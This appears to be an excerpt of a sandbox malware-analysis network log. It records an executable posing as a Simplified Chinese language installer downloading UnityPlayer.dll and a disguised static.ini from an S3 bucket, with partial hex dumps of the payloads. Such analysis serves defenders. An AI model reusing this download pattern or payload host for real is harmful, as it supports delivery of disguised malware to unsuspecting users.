2025-03-13 09:50:29 UTC	9000	IN	Data Raw: 7f 80 81 82 83 84 85 86 87 88 89 8a 8b 8c 8d 8e 8f 90 91 92 93 94 95 96 97 98 99 9a 9b 9c 9d 9e 9f a0 a1 a2 a3 a4 a5 a6 a7 a8 a9 aa ab ac ad ae af b0 b1 b2 b3 b4 b5 b6 b7 b8 b9 ba bb bc bd be bf c0 c1 c2 c3 c4 c5 c6 c7 c8 c9 ca cb cc cd ce cf d0 d1 d2 d3 d4 d5 d6 d7 d8 d9 da db dc dd de df e0 e1 e2 e3 e4 e5 e6 e7 e8 e9 ea eb ec ed ee ef f0 f1 f2 f3 f4 f5 f6 f7 f8 f9 fa fb fc fd fe ff 80 81 82 83 84 85 86 87 88 89 8a 8b 8c 8d 8e 8f 90 91 92 93 94 95 96 97 98 99 9a 9b 9c 9d 9e 9f a0 a1 a2 a3 a4 a5 a6 a7 a8 a9 aa ab ac ad ae af b0 b1 b2 b3 b4 b5 b6 b7 b8 b9 ba bb bc bd be bf c0 c1 c2 c3 c4 c5 c6 c7 c8 c9 ca cb cc cd ce cf d0 d1 d2 d3 d4 d5 d6 d7 d8 d9 da db dc dd de df e0 e1 e2 e3 e4 e5 e6 e7 e8 e9 ea eb ec ed ee ef f0 f1 f2 f3 f4 f5 f6 f7 f8 f9 fa fb fc fd Data Ascii:
2025-03-13 09:50:29 UTC	16384	IN	Data Raw: 00 dc 00 00 00 00 00 00 00 80 33 01 40 01 00 00 00 43 00 00 00 00 00 00 00 90 33 01 40 01 00 00 00 cc 00 00 00 00 00 00 00 a0 33 01 40 01 00 00 00 bf 00 00 00 00 00 00 00 b0 33 01 40 01 00 00 00 c8 00 00 00 00 00 00 00 98 19 01 40 01 00 00 00 29 00 00 00 00 00 00 00 c0 33 01 40 01 00 00 00 9b 00 00 00 00 00 00 00 d8 33 01 40 01 00 00 00 6b 00 00 00 00 00 00 00 58 19 01 40 01 00 00 00 21 00 00 00 00 00 00 00 f0 33 01 40 01 00 00 00 63 00 00 00 00 00 00 00 58 18 01 40 01 00 00 00 01 00 00 00 00 00 00 00 00 34 01 40 01 00 00 00 44 00 00 00 00 00 00 00 10 34 01 40 01 00 00 00 7d 00 00 00 00 00 00 00 20 34 01 40 01 00 00 00 b7 00 00 00 00 00 00 00 60 18 01 40 01 00 00 00 02 00 00 00 00 00 00 00 38 34 01 40 01 00 00 00 45 00 00 00 00 00 00 00 78 18 01 40 01 00 Data Ascii: 3@C3@3@3@@)3@3@kX@!3@cX@4@D4@} 4@`@84@Ex@

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49693	3.5.237.40	443	1784	C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-13 09:50:32 UTC	75	OUT	GET /UnityPlayer.dll HTTP/1.1 Host: priapic.s3.ap-east-1.amazonaws.com
2025-03-13 09:50:32 UTC	447	IN	HTTP/1.1 200 OK x-amz-id-2: tvSSz8PcDI641zofkPJQGoFeKsTgXc8P1RbBeEL3nU5+g9fRThsBW9bsKZLBjjR1nwXolrIsqSVunAVoyNPc06ChkOOAW3dk x-amz-request-id: YVRBAW13ERVFQFCR Date: Thu, 13 Mar 2025 09:50:33 GMT Last-Modified: Thu, 13 Mar 2025 07:01:02 GMT ETag: "703b44275b9c2653519e1dd227e6e602" x-amz-server-side-encryption: AES256 Accept-Ranges: bytes Content-Type: binary/octet-stream Content-Length: 1691806 Server: AmazonS3 Connection: close
2025-03-13 09:50:32 UTC	16384	IN	Data Raw: 1f 8b 08 00 00 00 00 00 04 00 e4 bd 09 74 14 55 f6 30 5e 9d 4e 48 03 09 d5 2c 2d 11 11 82 13 14 8d 4b 24 8c c2 34 4a 77 48 c3 2b a8 86 08 04 18 59 cc 08 c6 a8 08 81 74 27 41 04 82 9d 48 da b2 34 ce e8 0c ce b8 30 33 2e 8c 8a e2 06 01 17 12 02 59 58 42 40 65 11 15 98 71 a4 42 8b 06 1c 43 e2 42 7d f7 de 57 bd 25 41 f8 cd ff 77 fe e7 3b e7 f3 48 ba ea d5 ab fb de bb f7 be bb bc 77 df 2d f7 ed 15 82 59 10 84 58 f8 a7 eb 82 50 29 f0 ff 1c c2 85 ff 1b 66 12 84 5e 83 b7 f4 12 de e9 be 67 48 a5 49 de 33 64 5a de 3d 05 c9 f9 4b 16 dd bd e4 77 f7 27 cf fb dd c2 85 8b 3c c9 77 de 95 bc c4 bb 30 f9 9e 85 c9 99 93 a7 26 df bf 68 fe 5d d7 27 26 f6 48 31 60 fc f9 8b fc 35 5f 6c 1d b4 2b f8 ef 60 9d ba ab 11 7e f7 8e fa d7 ae cf e9 f7 f2 9d 9f d1 ef 80 9d 87 e9 77 f0 ce Data Ascii: tU0^NH,-K$4JwH+Yt'AH403.YXB@eqBCB}W%Aw;Hw-YXP)f^gHI3dZ=Kw'<w0&h]'&H1`5_l+`~w
2025-03-13 09:50:32 UTC	577	IN	Data Raw: fa be 65 ab 33 3f 86 8e 80 b5 3b 3f c0 a3 53 62 19 9e f5 c8 cd b4 9f f4 f6 48 6f 15 37 d5 36 af 30 21 5d 8b b3 c3 69 27 1e cd c6 dd 9f 36 54 b8 43 30 ef 11 cf 9c f2 58 36 ae df c1 9c 1f 0b e6 f7 f8 3c 71 d3 8e e6 b1 78 48 1b 73 79 67 2a ad ba ed 72 7a ed 18 19 12 e5 24 c4 ce ca a9 2d d2 be 73 92 ef 5c f2 92 a5 d2 2a 8c 7e 1a 53 70 f3 64 75 f4 4d e1 40 4e d9 de 26 ae c6 d3 de 6e b3 2e 29 7b 3d 77 06 63 95 6e 93 d4 f1 3c aa 13 7d 9a 40 7f fe fe 4a d1 d7 40 b6 09 de 50 0d a5 5e 2b 5a c6 c3 3d 7b 45 1d fb 49 d2 6d d7 cc 00 3a 39 b7 d2 4a 2c 08 e6 c9 cb 28 48 08 0f 1d 60 74 2a 3f c7 b3 f1 51 8a 71 4a 47 e9 a5 32 18 db e4 3c b7 9a 70 33 8d f9 f7 d3 62 84 d6 f1 f9 b1 70 e3 e1 c7 45 6a 03 03 98 72 47 9e 6e bb 79 1a 8e 76 17 7e d8 17 e4 c9 be 36 00 31 8e 12 1a 8d Data Ascii: e3?;?SbHo760!]i'6TC0X6<qxHsygrz$-s\~SpduM@N&n.){=wcn<}@J@P^+Z={EIm:9J,(H`t*?QqJG2<p3bpEjrGnyv~61
2025-03-13 09:50:33 UTC	16384	IN	Data Raw: ff 50 94 e7 86 f6 2e 21 68 50 eb 94 67 26 0d 39 8e be 2c 31 59 4d 59 41 4f 92 f0 49 5f 59 71 e7 b9 95 ed 94 ea 03 7a de 7a 1b 46 3f 40 e5 64 ac cc 07 7a f2 36 3c ef 8a 55 64 4c 19 05 25 da 6d b8 c1 3f 06 0d db 78 6e d8 02 ea c0 1f 56 16 f0 03 30 39 ac 6e bc 91 8b 6a bc d5 88 52 00 26 9b 8d 86 89 63 ea 74 9e b0 04 7c a3 d3 74 40 f9 b4 b3 b5 ba 03 89 9c 9c 44 e3 c2 24 62 9c 44 0b 8c c3 15 48 a7 dd 02 a7 d3 76 c2 52 9e 05 e6 97 64 1e a6 db 7a 40 ef f0 55 4e 2e 1d c9 85 e7 48 6f 33 42 ef 88 5c e3 88 5c e3 f2 e8 d1 be 2c 9c 5d 93 80 5c 6d 92 d2 80 67 d2 c0 6e b7 37 17 2d c4 40 f7 4b 9c 21 34 ce 75 1a 68 d4 3d 53 31 f2 7c a6 ac a6 e4 d1 e3 7e f8 58 24 24 1d 24 90 af 03 48 a7 81 47 dd c3 7b f0 b7 2c 03 8f 07 09 8f 50 b2 96 1a 9e 8f e1 0f a9 88 4c 33 47 26 8c 8f Data Ascii: P.!hPg&9,1YMYAOI_YqzzF?@dz6<UdL%m?xnV09njR&ct\|t@D$bDHvRdz@UN.Ho3B\\,]\mgn7-@K!4uh=S1\|~X$$$HG{,PL3G&
2025-03-13 09:50:33 UTC	1024	IN	Data Raw: 72 4f e8 3a 57 7c 3f 71 9d 2f 6e 89 62 d6 89 af e9 0b d5 da c5 42 f9 46 d9 b0 8f b3 4e d2 a2 43 e2 b2 98 b8 94 4b f5 eb 9d 74 ac eb db da 23 39 c1 f6 7a 3a c4 eb 69 79 de a0 77 d2 13 91 d9 1e c9 0c be 3f 21 f8 9e 12 5a 58 b2 30 66 1c f7 0d b0 47 9b 40 25 bd 96 de 10 8e 7a 3a fd 35 31 fe 0c a6 03 a1 63 12 d3 65 8b a1 da 62 71 1e 60 d9 26 5f 94 8a b1 29 77 4e b1 85 a5 d0 7d ec 9a fc f7 43 30 1a 27 ea 03 3a c4 31 e5 6d d4 5b dc 3a 43 b5 b4 03 6b 17 86 6a 1b a2 57 00 06 0f 1e 32 86 49 ef 10 69 61 f9 21 0c a2 27 34 8f 7d fa ee 88 bf ad 5d 28 fe 7a c8 e8 44 83 f8 ed a1 64 b3 8b c5 c2 c3 a0 0b 95 96 d7 2d d8 01 b5 f9 6c cc dc d2 ee 1f f1 a4 9b c9 56 9f 52 dd 8e 1c a4 54 cb 9d e0 f8 6b 09 1d d4 12 3a a8 d5 60 d4 3f c3 63 d9 aa 6c d8 ae 59 da b9 3e a2 a2 10 08 e6 Data Ascii: rO:W\|?q/nbBFNCKt#9z:iyw?!ZX0fG@%z:51cebq`&_)wN}C0':1m[:CkjW2Iia!'4}](zDd-lVRTk:`?clY>
2025-03-13 09:50:33 UTC	16384	IN	Data Raw: ff 5b 09 b6 b4 14 22 79 8f 2e 94 0d 6f c9 3d 33 40 cb e7 e8 9a f7 cd d5 ca fa 63 aa 7e aa fd a0 35 d8 3d 7e 4e b8 28 00 f3 65 71 5b 1f 5b 2c 8c 62 c5 f2 4e f1 fc 56 43 35 1a 6d 46 11 4c 9c 71 f2 17 63 76 d9 9e 41 1e fb 6f 6a 27 f6 04 3f 20 e6 a5 33 43 c6 1f ec 13 15 07 78 c0 96 41 2d 18 35 07 0e e3 d1 ef 3f e0 55 34 21 75 15 a9 5b e5 e2 f9 d3 07 f1 b6 f8 40 7e 9c 6e 21 25 00 3d 47 84 c8 d2 0c e6 77 9d c8 69 7c e3 f5 5f 8f ef b1 f6 63 29 44 cb 6c 9c 91 20 91 58 1d ae 9f 44 7e e3 dd 35 fa 60 39 75 61 5e 85 78 f5 36 5e 68 5a f9 ee 6a 7d bf e8 a4 3b fd 88 1a fc 32 23 e0 80 29 66 a6 ea 7a 25 70 9e 16 5e 94 cf 54 9c 2f 27 23 ba 9a de 9a 03 85 c1 53 19 fe 83 5a f8 e6 fc 4d b1 13 08 d9 9a 17 75 a6 de 71 15 e3 35 7d 51 45 5d 78 b6 7d 13 d0 9e d8 cb ce 88 32 76 2c Data Ascii: ["y.o=3@c~5=~N(eq[[,bNVC5mFLqcvAoj'? 3CxA-5?U4!u[@~n!%=Gwi\|_c)Dl XD~5`9ua^x6^hZj};2#)fz%p^T/'#SZMuq5}QE]x}2v,
2025-03-13 09:50:33 UTC	1024	IN	Data Raw: 54 6f b9 81 dd 3b b8 0c 52 64 19 0c 4b d7 83 f3 b0 0b e6 e5 c4 ff 8a 8e a1 ad 82 8e e0 bd 76 4f ae 23 9c 95 0a 1d ce 15 7f 7c d4 d6 93 4b 2d 3b a8 9d c9 a9 1c c9 7d 7e ce 25 13 b4 a6 65 96 f1 95 19 fe aa e4 c9 48 31 41 9b c7 4d d0 06 17 31 c0 1a ed 87 8f 26 e9 f0 8e 47 2d 6b b4 21 38 a1 7e 19 97 8a 9a 5c b4 ff 3c 42 a7 f4 9b b7 12 ab 88 86 27 5a 1f d0 64 85 b1 25 e1 3b 3f 7e f7 92 93 bc 1a 70 17 ba c3 a2 fc 11 8e e0 f0 68 d5 bb 19 3f 0a fa 1a 42 14 4b 92 0a e4 f8 34 cb 49 ff 6d 6c bc 1e be de 99 46 53 13 90 00 f9 88 dd fc e4 70 60 7f 01 1d 15 a4 36 a6 c8 ea 0d 82 11 fb 3a 5e f2 08 d7 11 b3 7a 78 70 b9 0f 93 c7 64 3c 95 ba 9f cf 96 e4 d0 2e 37 fe 00 09 4b a4 33 57 bb 5b 48 22 a7 df 24 29 e8 6d c6 13 14 76 60 83 1d 3a 1a d7 48 5d 0c bf 15 61 b1 fe 30 6f c7 Data Ascii: To;RdKvO#\|K-;}~%eH1AM1&G-k!8~\<B'Zd%;?~ph?BK4ImlFSp`6:^zxpd<.7K3W[H"$)mv`:H]a0o
2025-03-13 09:50:33 UTC	1749	IN	Data Raw: 71 5c bf cc f5 46 fc 1e 2c f9 f3 3e 8c 4e 13 8d 7c 33 a8 f5 f5 85 c7 07 bd ed 50 32 74 cd 36 be ea 41 5f 13 0b fc bc 71 17 60 90 b6 d1 a1 e2 7b 96 84 dd 76 3b d4 aa 39 20 d5 ba 71 a7 d4 83 66 10 63 49 a9 91 e6 50 7c ee 74 57 8e c0 e4 31 d4 37 6c 0f 48 43 2d a7 b9 49 64 55 88 ce d7 a4 9a 2d 00 41 57 b8 2f 55 1e 7c 23 fe fe 4c 1a 6c ab fb 86 91 07 ad a5 d0 0e 1a 00 b8 8c d0 91 58 cc 71 77 2f c4 40 a9 91 2b cc 71 d7 c2 1d 6b 8e ff 2e 03 27 91 28 85 3c c3 fe bd 6f a6 39 d0 f3 9d b5 7a 61 48 73 e6 4d 39 e8 31 0f 72 9b 37 50 ee e5 56 6e a7 95 bb 7c d8 dc d4 c6 6c ab 0c 69 e7 09 37 6b 33 6f 2a 02 12 af 57 d9 82 1c d9 3a d2 b1 6a 28 80 f4 27 6c 1b d4 61 c2 11 c2 7a e9 b5 05 0b 53 43 1b 2c 09 b1 a7 b0 9d 85 1f 91 a3 9c 65 30 21 06 73 d5 a6 bd 5c cd 64 59 8e c2 ce Data Ascii: q\F,>N\|3P2t6A_q`{v;9 qfcIP\|tW17lHC-IdU-AW/U\|#LlXqw/@+qk.'(<o9zaHsM91r7PVn\|li7k3o*W:j('lazSC,e0!s\dY
2025-03-13 09:50:33 UTC	9000	IN	Data Raw: 01 c5 a7 a1 53 59 26 e7 c0 9c a9 b0 a0 a2 45 3f 97 7d 31 9c e9 8a 90 41 15 00 33 90 66 36 23 9b 02 f9 5d 08 14 7e 80 ca 06 cb 31 9c 34 48 ff aa 5b e7 86 65 5b 99 e6 21 0b 8b 4c 2d 3a 35 d6 23 b2 f9 39 be 36 69 d3 cf 69 9a 7d f9 41 f8 c2 db a6 78 5f c6 7d 44 99 75 63 f0 cf 52 c3 55 20 fb 9a a4 92 13 be 53 d2 ac 53 b2 ef 64 e5 e4 9a d3 91 4c cd 74 49 35 18 2c 37 e1 c6 3d 22 f4 22 85 9f fa 4e 48 35 2a dc c3 eb 88 a7 d4 c8 4a f7 9d 8c b8 e5 dd b6 10 f1 41 80 bd 9e 74 88 ed 99 8b a7 ac f9 a8 c2 5a ea d1 ba 5c b1 e3 6e 7f ed 34 01 4f 6c 29 41 ac cd 16 fc 52 dd 9b b8 2c 3f c8 93 9c 90 c4 30 a1 9b 12 cc 16 c8 03 49 21 e6 0b b2 bb f3 f9 7e 0e ba e5 bc 3b 47 29 fe 51 3e 60 e4 47 f9 01 40 fe 95 2a 5b 98 1b 64 f3 3c 01 b6 47 66 e7 e2 77 6d 82 35 8c 70 8f 47 15 d6 e7 Data Ascii: SY&E?}1A3f6#]~14H[e[!L-:5#96ii}Ax_}DucRU SSdLtI5,7=""NH5JAtZ\n4Ol)AR,?0I!~;G)Q>`G@[d<Gfwm5pG
2025-03-13 09:50:33 UTC	16384	IN	Data Raw: 5c 55 15 6f 0b a3 c9 b0 bc 43 55 94 06 e9 97 f0 38 5d 67 b8 03 6c a9 7a 19 ee 55 91 0e e3 ad 4e 32 48 5c 24 d5 dc 80 47 e0 14 4f ca 56 2c bd 0d 9d 0e c8 05 fd f6 3f 78 68 a1 af a1 c0 bf 28 9a 7e 03 87 a4 be c6 af ea 72 81 cc 0e 24 5c 08 63 a8 78 2d 29 35 8e bb 14 d5 5f f4 05 45 96 bb c0 13 38 25 b7 59 5e fe c6 93 7d 10 2d e8 b9 b2 0f af 2d a4 a3 5f d1 9c 90 be da df e4 77 4f 9b c1 15 2a fd 78 f2 a4 42 b9 05 52 f5 3d 02 06 ed 5e 5b 24 55 47 04 4b ef 94 da 43 fa 6f 39 52 cd 6d c2 a0 f3 1b 6e 26 54 99 8f fa 94 a4 4c 79 2d ad 32 3e e9 7e 37 e1 61 9f c4 3e 72 69 7b d2 34 b3 60 bd a8 fd 4d 02 52 cb b2 35 27 b9 cb d3 1b 09 f7 9e e2 0d 05 e1 4c 0b eb 21 7d 83 5f bf cb a3 6f 28 e0 10 a1 29 03 87 e8 b0 23 05 22 8c bb 45 10 35 38 06 41 f4 92 f5 19 b4 72 9a a2 af 9e Data Ascii: \UoCU8]glzUN2H\$GOV,?xh(~r$\cx-)5_E8%Y^}--_wO*xBR=^[$UGKCo9Rmn&TLy-2>~7a>ri{4`MR5'L!}_o()#"E58Ar
2025-03-13 09:50:33 UTC	1024	IN	Data Raw: 18 49 04 3b 12 c1 3d 89 e0 fe 44 30 9a 08 f6 24 82 bd 89 60 52 19 1c 89 a0 33 11 cc 4e 04 73 12 c1 dc 44 30 3f 11 2c 4c 04 3d 89 a0 9c 08 96 25 82 33 12 c1 f2 44 70 76 22 38 2f 11 5c 90 a8 36 94 9f 04 54 97 02 35 a4 40 ab 52 a0 d5 29 d0 33 29 d0 da 14 88 6c 01 fb 13 b8 85 b9 b4 01 34 59 2f 29 ae 90 5c 13 46 1c 28 33 96 b5 d5 9a d5 0c 31 1d f1 98 f0 9e a3 68 67 76 2a 2a d4 17 15 e9 8b 72 f6 cd 2b bb 2f 2a a7 2f 2a b7 2f 2a bf 2f aa b0 2f ca d3 17 25 f7 45 95 f5 45 75 f4 2d fd 9e be a8 fd 7d 51 d1 be a8 9e be a8 de be 28 ba 36 31 15 e5 e8 8b 72 f6 45 65 f7 45 e5 f4 45 e5 f6 45 e5 f7 45 15 f6 45 79 fa a2 e4 be a8 b2 be a8 19 7d 51 e5 7d 51 b3 fb 49 d8 f7 73 cc eb 1b 6b 41 5f 54 75 5f 54 5d 5f 54 43 5f d4 aa be a8 d5 7d 51 cf f4 45 ad ed 8b da d0 17 15 ea 8b Data Ascii: I;=D0$`R3NsD0?,L=%3Dpv"8/\6T5@R)3)l4Y/)\F(31hgv*r+/////%EEu-}Q(61rEeEEEEEy}Q}QIskA_Tu_T]_TC_}QE

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	49695	3.5.237.40	443	1784	C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-13 09:50:42 UTC	70	OUT	GET /static.ini HTTP/1.1 Host: priapic.s3.ap-east-1.amazonaws.com
2025-03-13 09:50:42 UTC	446	IN	HTTP/1.1 200 OK x-amz-id-2: kJ5gLTF/X5qpLTwfjE1g2qMKcBDOob2DNgwf/3P7OCGD4Lyd2ofoa6st/DArHLTnhumyBTdUNOVlJW0FS7EEmfkJvCY2Ilhp x-amz-request-id: T89NQ1TRTZBGY8EG Date: Thu, 13 Mar 2025 09:50:43 GMT Last-Modified: Thu, 13 Mar 2025 07:01:05 GMT ETag: "f34c7cd0424c682fdd27f13f7bdd7733" x-amz-server-side-encryption: AES256 Accept-Ranges: bytes Content-Type: binary/octet-stream Content-Length: 621778 Server: AmazonS3 Connection: close
2025-03-13 09:50:42 UTC	16384	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 5d 00 00 01 86 08 02 00 00 00 ce f1 a3 0d 00 00 00 09 70 48 59 73 00 00 16 25 00 00 16 25 01 49 52 24 f0 00 00 00 11 74 45 58 74 53 6f 66 74 77 61 72 65 00 53 6e 69 70 61 73 74 65 5d 17 ce dd 00 00 20 00 49 44 41 54 78 9c ec bd 57 a2 24 3b 8e 25 08 d0 3d 7b cd b3 85 d9 62 ef a4 32 dc 70 e6 03 9a a4 89 2b e2 65 75 4f 31 5f de 30 37 a3 00 41 68 2a fe df ff ef ff 03 92 e3 23 44 20 22 62 26 22 26 ce 47 22 22 1e 63 10 31 40 96 8d a8 3e 33 33 b3 7e 25 22 10 6a 26 10 83 06 13 7b 65 4b 02 00 2f bc 4d 4c c4 cc 91 39 fe d6 87 8b 74 9b e3 35 06 33 8b 48 64 e6 02 18 20 06 06 5b 1f 14 98 02 12 69 16 f6 54 ca a2 94 5d 00 b3 0c 20 26 66 8a b2 db 9e e6 b3 0f 4c e4 1f 63 50 c5 4f 47 0e 00 c8 25 0e 98 06 8f ec f6 92 Data Ascii: PNGIHDR]pHYs%%IR$tEXtSoftwareSnipaste] IDATxW$;%={b2p+euO1_07Ah*#D "b&"&G""c1@>33~%"j&{eK/ML9t53Hd [iT] &fLcPOG%
2025-03-13 09:50:42 UTC	578	IN	Data Raw: 1d 75 6a 36 9d 1f c0 11 91 47 72 d3 ca e0 b8 12 59 c4 c3 98 d5 d0 07 db 89 88 f1 c6 83 8b 76 f6 3a 5c 25 19 1a 5d 20 29 c0 cd 05 2f bc 12 02 be b2 63 9e c9 b0 0e 65 ed 5d 95 7a d3 10 2f 17 91 f5 b2 da a5 09 2c ab 69 70 b9 77 f7 96 e4 b2 27 b5 16 44 37 89 40 e8 d7 dc 86 58 3b 07 b0 35 1e b6 86 19 5c d0 37 37 a4 89 3d 99 00 00 20 00 49 44 41 54 96 d9 5d b4 60 e9 de ba 18 06 12 80 74 86 20 63 d0 ce 7b 02 3d 3f 91 99 f8 35 d4 91 50 82 32 7b 89 3d fc 03 f1 8b d5 1a c4 99 86 cd 35 18 f5 88 40 81 89 31 bf 1c df 2a 3e 67 93 1d 1e 92 6d 05 cc 0c 25 b2 7e 9d 23 b7 48 fb 68 67 47 22 f6 17 45 ac 87 cd de b9 74 43 27 3e e2 8d 67 27 50 af e5 d0 79 e4 6c 81 14 44 44 6f df 98 65 5c a7 88 d3 05 78 ae 74 94 40 a4 1a 65 93 dd 21 87 08 30 c6 50 9f 80 fb 5a c7 33 83 b5 e8 c8 Data Ascii: uj6GrYv:\%] )/ce]z/,ipw'D7@X;5\77= IDAT]`t c{=?5P2{=5@1*>gm%~#HhgG"EtC'>g'PylDDoe\xt@e!0PZ3
2025-03-13 09:50:43 UTC	16384	IN	Data Raw: f7 96 b9 fe da f6 81 29 4e 15 60 56 76 63 d7 8e f3 f5 b1 33 9d e4 41 ca d1 d6 04 5e 0d d2 d4 6c f9 2b 21 6c 32 b6 c8 cf 5a 9c 9f de bf f8 a5 14 e8 be b8 96 ef 2b 29 ad c3 b3 54 97 e7 d0 33 6d 71 9b 94 0f 23 76 f1 93 aa 1e 24 3e ef e0 df 6e 9a b0 6c 1b f8 dd 24 82 7f ff fb df 2a cd 78 77 03 59 91 41 c9 ae 93 19 f1 24 99 36 72 23 e3 4b 7d f9 1b 1d ff 46 42 9f 7b 7e 10 ff f9 8b 90 23 7c e1 ff 64 fa 27 9a ff bb a3 1f f4 bc 48 eb 7f 86 ea 8a 45 f1 4f cd e5 f7 b4 f5 e6 6b 04 f8 92 ce 2f 64 e3 d3 e4 f2 ad e9 c5 22 22 e6 d6 df f5 da 5b f6 80 92 06 85 72 56 a5 da 7b fb 04 3f 23 99 44 38 da 13 31 43 d3 e2 5b 7b 83 22 b7 e6 d4 18 6c f1 23 cb 95 42 27 8d 97 28 ae 96 a5 c8 6f 16 47 f5 f7 29 f3 54 d1 ab 51 d3 ec 8c ba 2d 02 11 e8 b9 e5 e4 86 aa f5 a4 ac 10 bb 66 5e d8 Data Ascii: )N`Vvc3A^l+!l2Z+)T3mq#v$>nl$*xwYA$6r#K}FB{~#\|d'HEOk/d""[rV{?#D81C[{"l#B'(oG)TQ-f^
2025-03-13 09:50:43 UTC	1024	IN	Data Raw: 87 39 35 7c 6a 95 9a 44 c0 4f 71 0a 82 19 3f 2d 8b 47 12 8b 4e 1c 23 07 3f 58 0d ea 7e 8e ae 83 94 ef a0 a2 e4 ef 70 51 87 df 0f c5 d6 60 dc 3c ab 53 fb c4 79 b6 28 d4 37 26 a4 2a 81 d7 09 89 d1 0e c8 da ca 02 5d 66 7b ed b5 f7 e6 16 72 71 db fe 7e d0 12 68 e4 9e 15 9d 2a ff 9a 63 b8 b3 44 15 ad 92 99 04 0e 45 17 bc ec e4 a1 d7 64 5b ef 28 50 2e b9 ec 0e e5 b4 7d b2 bd 24 bd ef 90 73 ae b5 b7 31 54 3c 5e 5c 5a dd 57 00 aa 32 74 a8 ea f6 a8 ff ea 7c 6e d5 b8 20 7f fc 44 a1 dc 19 9d 0f 30 b4 88 28 a2 22 37 36 fb 5e 1e 5b 94 18 35 5c 91 64 cd 91 3a 54 d5 10 ba 9b cb 5f 11 95 55 25 48 c2 db 1c f0 e9 d4 8a 38 23 d9 43 21 8b fe 0d 50 e3 24 45 19 95 de ab 6e 9f 3b 41 54 85 14 af f4 67 09 1b 67 90 82 a2 43 b2 d3 5f 5f 71 df bf 0f 66 72 f1 cf ef e8 e4 fc b5 6d 6a Data Ascii: 95\|jDOq?-GN#?X~pQ`<Sy(7&]f{rq~hcDEd[(P.}$s1T<^\ZW2t\|n D0("76^[5\d:T_U%H8#C!P$En;ATggC__qfrmj
2025-03-13 09:50:43 UTC	16384	IN	Data Raw: 30 c4 40 93 ed c5 49 6e 5c 14 11 d3 d4 23 23 34 4a b8 41 24 2e 4e 51 e7 a1 ee c2 f5 0f ee 90 14 c8 1c fa 67 0e 97 32 ca 48 8e 80 4f a8 50 a7 3e 02 12 5d 15 73 e8 19 a2 13 07 17 f1 b1 01 1f 7c a3 64 53 49 fb f6 a4 28 b4 e7 68 c5 6c 67 29 87 c3 be 72 dd 8b 3c 4d 40 55 9d b2 11 62 4e b2 1e 10 d8 24 68 1e b4 18 12 7a 96 4d 2b 78 db c6 6d 7b c3 0d 7e b6 f3 98 a6 65 db 09 64 db 7e af 37 33 51 b8 e1 62 bc f1 0e 32 7b aa 52 7d 33 fe 47 5c a5 a6 f1 b1 97 2f 5c fc fc 0e cb 40 00 a4 b2 25 02 3d d6 f9 10 26 e1 92 d9 11 34 d0 c0 13 80 60 be dc 21 77 d6 b5 09 19 df 8f 44 7a 2c 86 7a 56 b9 84 4e e8 f4 3a 74 88 aa 0a 44 d4 74 f3 80 76 fa bd e3 78 01 42 f4 61 a7 ba 71 11 9d 0f 7c 87 8b a7 c4 4f c3 92 f6 dd bf b3 c8 3e c3 9f 9f ff f9 72 92 2c 3a 3e 9d 39 63 7b f6 30 d9 d9 Data Ascii: 0@In\##4JA$.NQg2HOP>]s\|dSI(hlg)r<M@UbN$hzM+xm{~ed~73Qb2{R}3G\/\@%=&4`!wDz,zVN:tDtvxBaq\|O>r,:>9c{0
2025-03-13 09:50:43 UTC	1024	IN	Data Raw: a0 c6 d8 47 72 8f 13 1b c8 b2 1a b2 96 ed 1a 7d 00 db 99 cf ed 5f 3c 59 99 b8 2d dc 02 32 55 7d 7a d5 4d 4b 2f 7e 29 b9 a4 7c 7c 59 bb a3 f0 ec 93 10 d9 09 d4 ac e6 2b 44 05 ff 17 9e 18 01 70 4c 66 cb 6a 9c 84 fd 5c e2 48 48 e2 61 3a 5f 85 d5 14 13 61 ff d4 e1 88 43 3b 06 1e 03 3a 28 22 bf 44 dc 4c 1c e3 1f 5d 89 a1 1a cc 78 d9 e1 07 27 92 4e ff 24 87 e0 eb 4b 3c 97 43 88 5f 2e 28 e8 42 ed af c7 20 31 58 a6 d6 cc 7f 99 b3 e7 b3 7f 9e e7 49 9b 53 33 40 09 01 28 91 81 da db cc af 85 ce a9 fa 0d 1e 40 da 77 11 aa c4 90 8a 10 96 95 d1 fd 7e 17 0a 19 dc 1c 16 6c dc f9 72 66 fa a8 fa 86 d1 46 9c c0 77 6f 55 00 0a 88 9a 19 28 46 e1 21 f8 12 1e 03 c7 80 87 75 63 b6 3c 06 2f f6 99 4d 4d 14 54 a5 e7 85 7e 0a 0f ab 69 5f c0 53 b8 88 48 d5 ce 26 0b 15 95 93 b4 5f bf Data Ascii: Gr}_<Y-2U}zMK/~)\|\|Y+DpLfj\HHa:_aC;:("DL]x'N$K<C_.(B 1XIS3@(@w~lrfFwoU(F!uc</MMT~i_SH&_
2025-03-13 09:50:43 UTC	1749	IN	Data Raw: 69 97 26 0e 56 0a 9b e2 cf fe 86 e6 cc f8 6e d4 65 a2 2c ff 34 36 1f aa 8b c0 5a 8e 81 00 3c 4f d8 8e 8b 1b 34 5d d1 87 d9 68 b3 1c b7 fb d0 87 54 6c 97 6f ff e9 65 bf 5d 62 21 62 e0 e2 79 9e 73 9e e7 b9 70 51 95 53 dc 85 d6 a3 d4 8b 8d 6c 3b 1e 82 48 e8 93 c4 50 f3 cb 24 fb 5a 50 35 e8 92 4f 80 5c 65 fe 49 66 5c 02 d2 fb 23 7c 11 d7 9b c8 ba 8d 62 b0 63 3c 52 d9 75 6b 3c f4 a1 e7 3c ce af 63 9e 53 64 1c bf 7e f9 27 ae 66 3d 46 ec 52 85 5c 62 db 4a 4c a9 6d fd 7f e1 62 fa 4a 34 59 d3 84 f4 0c 85 0d 11 d1 b4 45 70 38 f7 a7 40 06 e5 90 91 ba 66 08 71 c2 cd dc d2 27 ce ad 64 67 fa a9 7a e9 8e 8b 79 4e 66 f1 6a f7 57 08 55 5c 4f b7 29 16 cf 5e 36 12 4b 0c 6a 95 0e b3 b3 76 d4 02 17 d5 74 00 f6 78 c8 63 8c 41 19 f0 64 54 a3 70 d1 87 6a 64 38 82 38 bd 1d 5e 2f Data Ascii: 